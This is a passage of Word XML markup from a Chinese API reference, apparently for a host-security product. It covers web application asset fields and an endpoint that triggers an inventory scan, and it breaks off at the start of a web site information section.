          <w:p w14:paraId="3D838741" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E88F1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C76F2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3AA45099" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7956338D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B048E32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D01C9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E65DAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A822BB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB4D180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD6061F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B5BF4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377910B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50238ADA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED40E62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18388598" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B69D057" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356A7552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="268C1C22" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E92B2A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CDC61E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA47512" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792BF612" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0BCF8E0E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6820071C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FBDB74E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2E0806" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF69C1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D232840" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3489652F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15FB9B76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7087BA1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FB9F83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F5C2C89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CBF9E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="243F579B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D10A7BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FF8347" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="618D14DF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E25536C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FE0CEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6542F73A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55135412" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E277314" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C66A326" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="088DD77A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449021BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="686B0EE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="469AA936" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A76CB2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pluginCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5DD345" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7EC805" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CC4C5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>插件数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67FD47BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365A4825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="408E90E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3858CE9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41FB7D28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12E648C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB60030" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33322C2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D55BD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6231285C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C242F2C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2783080F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D8F466" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6624DBCC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F110CC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01EA9EBE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53326EA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>plugins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CB8A9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B912DE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pluginName：varchar(512) pluginUri：</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>varchar(1024) description：varchar(1024) author：varchar(512) authorUri：varchar(1024) version：varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B9AEFB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">插件信息列表 pluginName：插件名 </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>pluginUri：插件官网链接 description：插件描述 author：作者 authorUri：作者地址 version：版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20D8841D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="web应用信息扫描"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>web应用信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D512302" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求web应用信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8BF5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76926977" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/webapp/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4DEC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4395DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D93F1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045710BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/webapp/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B299D91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E9008" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463839E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76123931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34290AAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="25393F2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58B950C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E1AD0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB88E55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="168ECDB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203880B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32AE4272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6237ED13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F75C654" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="web应用信息查询扫描状态"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:t>web应用信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468C35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询web应用信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DCBA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="web站点信息"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:t>Web站点信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FAD647" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
